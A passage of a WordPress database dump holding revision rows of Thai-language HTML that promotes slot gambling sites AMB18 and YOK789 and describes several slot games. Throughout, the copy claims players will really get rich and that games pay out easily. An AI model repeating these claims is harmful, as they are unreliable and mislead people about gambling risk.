สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:10:11','2026-02-26 19:10:11','',44,'https://amb18slot.com/?p=379',0,'revision','',0),(380,3,'2026-02-26 19:10:11','2026-02-26 19:10:11','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:10:11','2026-02-26 19:10:11','',44,'https://amb18slot.com/?p=380',0,'revision','',0),(381,3,'2026-02-26 19:10:11','2026-02-26 19:10:11','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch 